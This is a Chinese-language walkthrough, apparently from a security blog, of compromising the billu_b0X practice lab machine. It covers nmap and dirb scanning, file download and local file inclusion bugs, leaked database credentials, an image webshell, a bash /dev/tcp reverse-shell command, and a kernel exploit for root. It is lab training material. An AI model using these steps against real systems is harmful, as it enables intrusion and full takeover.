靶机练习-1:billu_b0X

靶机练习-1:billu_b0X

环境准备:

Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址

kali linux 2020虚拟机,ip地址192.168.1.137

渗透步骤:

信息收集:
1.ip发现
1
nmap -sP 192.168.1.0/24

使用nmap扫描本网段主机,其中192.168.1.1为网卡地址,192.168.1.3为网关,137为本机地址,

目标靶机ip为192.168.1.132

image-20201231224509510

或者使用命令arp-scan -l扫描,效果相同,且不扫描本机

image-20201231224634344

2.端口及服务扫描

使用nmap进行端口和服务扫描,指定1-65535全端口,并添加参数A做服务识别和深度扫描,生成结果文件a.txt

1
nmap -p1-65535 -A 192.168.1.132 -oN a.txt

image-20201231224915291

从上图中可以看到,靶机是一台ubuntu,开启http服务,访问上去看一下

show me your sqli skills:让展示一下注入技巧,sqlmap测试未果,再看看其他的目录

[DKKlKx.png]

3.目录及页面扫描

用kali的dirb跑一下目录

image-20201231225713412+

同时windows用御剑跑一下,可以得到更多的爆破结果

image-20201231230127563

得到页面较多,test.php、add.php、in.php、c.php、index.php、show.php等,目录有:uploaded_images,phpmy,依次访问

漏洞挖掘
1.访问test.php:页面提示file参数为空,需要提供file参数

测试一下文件下载,不行,会跳转回首页

image-20201231230819189

2.在Firefox的Hackbar中,将get请求,变更为post请求,文件下载

成功,获得passwd文件,这里用burp改包也行,但是要麻烦一些,就直接hackbar了。

image-20201231231532879

3.通过同样文件包含的方法,下载add.php、in.php、c.php、index.php、show.php、panel.php等文件,后面可以访问文件的同时,审计文件的源代码。

image-20201231231649579

image-20201231232504441

  1. 查看passwd文件,发现1个id 1000的账号ica,ssh连接的用户名可以是ica或root

image-20201231232027735

访问add.php、in.php页面和审计代码

add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息

image-20201231232247255

image-20201231232539359

5.查看c.php源码

这是个数据库连接文件,人家直接写了mysql连接用户名密码

image-20201231232908417

6.通过dirb暴破出/phpmy目录,访问该目录到phpmyadmin登录页面

image-20201231233502816

用刚刚在c.php看到的用户名:billu,密码:b0x_billu登录,登录成功

image-20201231233707322

在ica_lab数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it

image-20201231233638955

7.回index.php,登进去

进来以后看到一个账号管理界面,里面已经有了两个账户,杰克船长和巴博萨船长

image-20201231234202943

两个账号的头像图片地址,在之前已经暴破出来:uploaded_images,登上去,下载一张图片jack.jpg出来,里面有些乱七八糟的东西,是我第一遍做的时候传上去的,不管它们,不影响接着做

image-20201231234443183

7.点击add user进入添加账号界面,这是一个图片上传,可以利用图片上传和文件包含获得shell。

查看之前test文件包含获得的panel.php源码,发现panel.php存在本地文件包含漏洞:

image-20210101103835037

用文本编辑器打开刚刚下载下来的图片,在文件末尾加一条命令,生成图片马

image-20210101104540102

把这张图片上传上去

image-20210101111249263

测试一下图片马能否正常使用,点击continue,用burp抓包,使用burp执行命令:

post请求url中加入执行命令的参数:POST /panel.php?cmd=cat%20/etc/passwd;ls

post的body中包含cmd.jpg图片马:load=/uploaded_images/3.jpg&continue=continue

image-20210101111519306

可以看到测试没有问题,命令成功被执行

image-20210101111627588

8.制作一个反弹shell,命令:echo “bash -i >& /dev/tcp/192.168.1.137/4444 0>&1″ | bash

需要先将命令url编码:

image-20210101120048156

在post的url中加入编码好的命令

image-20210101125246031

在发送前,先在命令行nc监听,以便接受反弹shell

image-20210101113430892

点击发送,接收成功

image-20210101125854351

提权
1.提权准备工作

这里需要找一个有写权限的目录,先前我们上传图片的那个目录/uploaded_images,很显然就有写权限,不然也没法往里面上传图片,我们在这个目录下写一个菜刀马,一会方便用菜刀连接传输文件

image-20210101130935950

image-20210101130908414

菜刀连接一下,如图连接成功

image-20210101131453390

2.提升权限

查看系统内核,命令uanme -a和cat /etc/issue

可以看到详细的系统信息

image-20210101132344836

这里可以使用一个著名的ubuntu本地提权exp,https://www.exploit-db.com/exploits/37292,这个链接可以下载下来

下载后把这个文件用菜刀放到/uploaded_images目录下

image-20210101132746285

然后赋予这个文件权限

image-20210101132913066

编译exp

image-20210101132958470

然后运行即可提权

image-20210101133102180

查看是否生效,如图,提权成功

image-20210101135446041

总结

在爆破完目录后注意要尽量利用test.php下载所有可下载的页面源码,以提高发现漏洞的可能;在登录phpmyadmin和拿到普通用户密码登录index.php时,要注意区分大小写;在上传图片马成功准备制作反弹shell时,尽量不要耽搁时间,页面会话时间较短,很容易会话过期,在利用图片马时,发送至repeater模块的请求是带有cookie的,若页面会话过期注意重新登录后更换请求,不然带着过期的cookie进行请求会一直接收不到反弹shell(被这个折磨了很久,一开始一直找不到原因)

靶机渗透

作者:C0mpactDisk,本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!